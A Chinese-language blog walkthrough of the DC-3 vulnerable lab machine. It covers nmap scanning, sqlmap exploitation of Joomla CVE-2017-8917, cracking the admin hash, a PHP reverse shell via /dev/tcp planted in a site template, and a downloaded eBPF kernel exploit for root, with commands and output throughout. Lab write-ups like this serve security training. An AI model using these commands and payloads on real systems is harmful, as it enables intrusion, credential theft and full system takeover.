HackerGu‘s Blog
主机发现
DC-3靶机的配置过程中出现了一点点的小问题,靶机一直寻找不到IP地址,看了网上大佬的解释,应该是网卡不匹配的原因,于是利用linux系统的拯救模式修改了网卡的配置信息,重启网卡,重启机器便获得了靶机的IP地址。待我完成这篇靶机,我补一个教程。
利用netdiscover命令发现目标机器为192.168.234.178
端口探测
使用Nmap
root@kali:~/桌面# nmap -sS -A -p 1-65535 192.168.234.178 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-08 15:02 CST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.178
Host is up (0.00055s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.178
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.234.178:80/
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.234.178:80/index.php/2-uncategorised/1-welcome
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.234.178:80/index.php/component/users/?view=reset&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=reset.request&Itemid=101
|
| Path: http://192.168.234.178:80/index.php/component/users/?view=reset&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.234.178:80/index.php
| Form id: login-form
| Form action: /index.php
|
| Path: http://192.168.234.178:80/index.php/component/users/?view=remind&Itemid=101
| Form id: user-registration
| Form action: /index.php/component/users/?task=remind.remind&Itemid=101
|
| Path: http://192.168.234.178:80/index.php/component/users/?view=remind&Itemid=101
| Form id: login-form
| Form action: /index.php/component/users/?Itemid=101
|
| Path: http://192.168.234.178:80/index.php/2-uncategorised
| Form id: login-form
|_ Form action: /index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /administrator/manifests/files/joomla.xml: Joomla version 3.7.0
| /language/en-GB/en-GB.xml: Joomla version 3.7.0
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.0.1
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2017-8917:
| VULNERABLE:
| Joomla! 3.7.0 'com_fields' SQL Injection Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2017-8917
| Risk factor: High CVSSv3: 9.8 (CRITICAL) (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
| An SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers
| to execute aribitrary SQL commands via unspecified vectors.
|
| Disclosure date: 2017-05-17
| Extra information:
| User: root@localhost
| References:
| https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
| vulners:
| Apache httpd 2.4.18:
| HTTPD:F564BBA32AA088833DA032B7EB77CA29 7.5 https://vulners.com/httpd/HTTPD:F564BBA32AA088833DA032B7EB77CA29
MAC Address: 00:0C:29:15:DC:FE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.234.178
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 365.77 seconds
由扫描的结果可知,目标机器只开启了80端口。使用的CMS为Joomla,存在注入漏洞,CVE-2017-8917。
CVE-2017-8917
这个漏洞影响所有使用joomla 3.7版本及以下内容管理系统的网站,攻击者可以使用利用这个漏洞获取数据库的内容,包括用户数据和session数据。得到这些数据后,攻击者可以利用session登录网站后台,查看敏感信息,还可以修改原密码。
在kali中利用searchsploit joomla查可利用的exp,结果发现joomla的漏洞也太多了,看的眼花缭乱。
还是在Github里面搜吧,searchsploit的结果也没显示CVE,不直接。
还好我们在这里看到了CVE-2017-8917在exploit-db中的序号,于是我们可以这样做,使用命令:
searchsploit joomla | grep 42033
再使用如下命令将exp保存到本地:
searchsploit joomla -m exploits/php/webapps/42033.txt
查看如何使用:
root@kali:~/桌面# cat 42033.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
看来要使用sqlmap:
利用语句:
sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
得到以下几个数据库
[16:16:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.1
[16:16:18] [INFO] fetching database names
[16:16:18] [INFO] used SQL query returns 5 entries
[16:16:18] [INFO] retrieved: 'information_schema'
[16:16:18] [INFO] retrieved: 'joomladb'
[16:16:18] [INFO] retrieved: 'mysql'
[16:16:18] [INFO] retrieved: 'performance_schema'
[16:16:18] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
紧接着重点看joomladb这个表
sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
看到了#__users,像这种带特殊符号的表,查询列的时候要带单引号”。
查询表下的列:
sqlmap -u "http://192.168.234.178/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' --columns -p list[fullordering]
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
有了username和password就好说了,直接dump。
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
由上图可知,我们利用john破解密码,最后得出密码为snoopy。
登录网站
网站的主界面告诉我们,此网站只有一个flag,而且我们必须获得root权限才可以获得flag。不管了,开干!
获取Flag
我们登录网站,输入账号密码。
把网站翻了一遍也没找到可以利用的地方,还是找后台吧。利用kali自带工具dirb。
root@kali:~/桌面# dirb http://192.168.234.178/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Feb 8 20:27:29 2020
URL_BASE: http://192.168.234.178/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.234.178/ ----
==> DIRECTORY: http://192.168.234.178/administrator/
==> DIRECTORY: http://192.168.234.178/bin/
==> DIRECTORY: http://192.168.234.178/cache/
==> DIRECTORY: http://192.168.234.178/components/
==> DIRECTORY: http://192.168.234.178/images/
==> DIRECTORY: http://192.168.234.178/includes/
找到了后台地址http://192.168.234.178/administrator/
登录后台即可。
这个CMS就和Wordpress很像,找到其模板编辑位置,修改模板文件就可以利用。
在这里,想到的是利用php写一个反弹shell。
我们先找到编辑模板的位置,如下:
反弹shell
编辑文件index.php
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.234.151/7777 0>&1' ");
?>
保存之后,我们在kali中开启监听。
使用命令,
nc -lvp 7777
待监听好之后,我们访问index.php即可。
现在我们拿到shell了。
获取交互shell
使用命令python -c 'import pty;pty.spawn("/bin/bash")'
获取ROOT
查找带suid权限的文件 find / -user root -perm -4000 -print 2>/dev/null
但是发现没有可以利用的。可能这次考察的内核提权,利用命令uname -a,查看linux的内核。
www-data@DC-3:/var/www/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
再利用searchsploit去查找exp。
root@kali:~# searchsploit linux 4.4.0-21
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x6 | exploits/linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubun | exploits/linux/local/47170.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 | exploits/linux/local/44300.c
--------------------------------------- ----------------------------------------
。。。。。。结果尝试了补天,还是不能成功。
接着我又试了CVE-2017-16995,还是没有成功。
看了大佬的文章,才知道利用的是linux拒绝服务漏洞进行提权。
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
直接使用wget下载到目标机,wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
----------------------------------------------------------------
tar -zxvf exploit.tar
gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now
www-data@DC-3:/var/www/html/39772$ tar -xvf exp
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
-----------------------------------------------------------------
cd ebpf_mapfd_doubleput_exploit/
./compile.sh //直接使用shell脚本进行编译,下面会报错,但是不影响。
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
------------------------------------------------------------------
接下来就是提权了。
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
id
id
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/var/www/html/39772/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls
ls
the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
__ __ _ _ ____ _ _ _ _
\ \ / /__| | | | _ \ ___ _ __ ___| | | | |
\ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
\ V V / __/ | | | |_| | (_) | | | | __/_|_|_|_|
\_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
Congratulations are in order. :-)
I hope you've enjoyed this challenge as I enjoyed making it.
If there are any ways that I can improve these little challenges,
please let me know.
As per usual, comments and complaints can be sent via Twitter to @DCAU7
Have a great day!!!!
本次完成靶机的过程比较艰难,第一次看这种内核提权,还是得多涨点经验。
